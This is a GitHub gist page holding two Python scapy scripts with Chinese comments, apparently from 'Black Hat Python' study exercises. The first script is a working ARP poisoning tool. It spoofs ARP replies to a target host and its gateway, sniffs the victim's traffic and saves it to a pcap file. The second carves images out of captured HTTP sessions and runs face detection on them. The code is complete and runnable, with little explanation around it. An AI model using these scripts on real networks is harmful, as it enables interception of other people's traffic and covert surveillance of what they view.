def get_mac(ip_address): | |
# 形如:(<Results: TCP:0 UDP:0 ICMP:1 Other:0>, <Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>) | |
responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10) | |
# 返回从响应数据中获取的MAC地址 | |
for s, r in responses: | |
return r[Ether].src | |
return None | |
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac): | |
# 构建欺骗目标的ARP请求(),这里没设置hwsrc,默认就是本机咯 | |
poison_target = ARP() | |
poison_target.op = 2 | |
poison_target.psrc = gateway_ip | |
poison_target.pdst = target_ip | |
poison_target.hwdst = target_mac | |
poison_gateway = ARP() | |
poison_gateway.op = 2 | |
poison_gateway.psrc = target_ip | |
poison_gateway.pdst = gateway_ip | |
poison_gateway.hwdst = gateway_mac | |
print "[*] Beginning the ARP Poison. [CTRL-C to stop]" | |
while True: | |
try: | |
send(poison_target) | |
send(poison_gateway) | |
time.sleep(2) | |
except KeyboardInterrupt: | |
restore_target(gateway_ip, gateway_mac, target_ip, target_mac) | |
print "[*] ARP Poison attack finished" | |
return | |
interface = "eth0" | |
target_ip = "192.168.1.7" | |
gateway_ip = "192.168.1.1" | |
packet_count = 1000 | |
# 设置嗅探的网卡 | |
conf.iface = interface | |
# 关闭输出 | |
conf.verb = 0 | |
print "[*] Setting up %s" % interface | |
gateway_mac = get_mac(gateway_ip) | |
if gateway_mac is None: | |
print "[!!!] Failed to get gateway MAC. Exiting" | |
sys.exit(0) | |
else: | |
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac) | |
target_mac = get_mac(target_ip) | |
if target_mac is None: | |
print "[!!!] Failed to get target MAC. Exiting" | |
sys.exit(0) | |
else: | |
print "[*] Target %s is at %s" % (target_ip, target_mac) | |
# 启动ARP投毒线程 | |
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac)) | |
poison_thread.start() | |
try: | |
print "[*] Starting sniffer for %d packets" % packet_count | |
bpf_sniffer = "ip host %s" % target_ip | |
packets = sniff(count=packet_count, filter=bpf_sniffer, iface=interface) | |
# 将捕获的数据包输出到文件 | |
wrpcap('arper.pcap', packets) | |
# 还原网络配置 | |
restore_target(gateway_ip, gateway_mac, target_ip, target_mac) | |
except KeyboardInterrupt: | |
# 还原网络配置 | |
restore_target(gateway_ip, gateway_mac, target_ip, target_mac) | |
sys.exit(0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import re | |
import zlib | |
import cv2 | |
from scapy.all import * | |
picture_directory = "./pictures" | |
faces_directory = "./faces" | |
pcap_file = "bhp.pcap" | |
def get_http_headers(http_payload): | |
try: | |
# 如果为HTTP流量,提取HTTP头 | |
headers_raw = http_payload[:http_payload.index("\r\n\r\n") + 2] | |
# 对HTTP头进行切分 | |
# (?P<name>.*?) ---> 对找到的结果进行进一步分割成字典形式 | |
# 如:dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", "Content-Type: image/pgf\r\n")) | |
# 输出:{'Content-Type': 'image/pgf'} | |
headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw)) | |
except: | |
return None | |
if "Content-Type" not in headers: | |
return None | |
return headers | |
def extract_image(headers, http_payload): | |
image = None | |
image_type = None | |
try: | |
if "image" in headers['Content-Type']: | |
# 获取图像的类型和图像数据 | |
image_type = headers['Content-Type'].split("/")[1] | |
image = http_payload[http_payload.index("\r\n\r\n") + 4:] | |
# 如果进行了数据压缩则解压 | |
try: | |
if "Content-Encoding" in headers.keys(): | |
if headers['Content-Encoding'] == 'gzip': | |
image = zlib.decompress(image, 16 + zlib.MAX_WBITS) | |
elif headers['Content-Encoding'] == 'deflate': | |
image = zlib.decompress(image) | |
except: | |
pass | |
except: | |
return None, None | |
return image, image_type | |
def face_detect(path, file_name): | |
img = cv2.imread(path) | |
cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml") | |
rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20)) | |
if len(rects) == 0: | |
return False | |
rects[:, 2:] += rects[:, :2] | |
# 对图像中的人脸进行高亮显示处理 | |
for x1,y1,x2,y2 in rects: | |
cv2.rectangle(img, (x1,y1), (x2,y2), (127,255,0), 2) | |
cv2.imwrite("%s/%s-%s" % (faces_directory, pcap_file, file_name), img) | |
return True | |
def http_assembler(pcap_file): | |
carved_images = 0 | |
faces_detected = 0 | |
a = rdpcap(pcap_file) | |
sessions = a.sessions() | |
for session in sessions: | |
http_payload = "" | |
for packet in sessions[session]: | |
# 这一步与在Wireshark中右键 Follow TCP Stream 相似 | |
try: | |
if packet[TCP].dport == 80 or packet[TCP].sport == 80: | |
# 对数据组包 | |
http_payload += str(packet[TCP].payload) | |
except: | |
pass | |
headers = get_http_headers(http_payload) | |
if headers is None: | |
continue | |
image, image_type = extract_image(headers, http_payload) | |
if image is not None and image_type is not None: | |
# 存储图像 | |
file_name = "%s-pic_carver_%d.%s" % (pcap_file, carved_images, image_type) | |
fd = open("%s/%s" % (picture_directory, file_name), "wb") | |
fd.write(image) | |
fd.close() | |
carved_images += 1 | |
# 开始人脸检测 | |
try: | |
result = face_detect("%s/%s" % (picture_directory, file_name), file_name) | |
if result is True: | |
faces_detected += 1 | |
except: | |
pass | |
return carved_images, faces_detected | |
if __name__ == '__main__': | |
carved_images, faces_detected = http_assembler(pcap_file) | |
print "Extracted: %d images" % carved_images | |
print "Detected: %d faces" % faces_detected |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment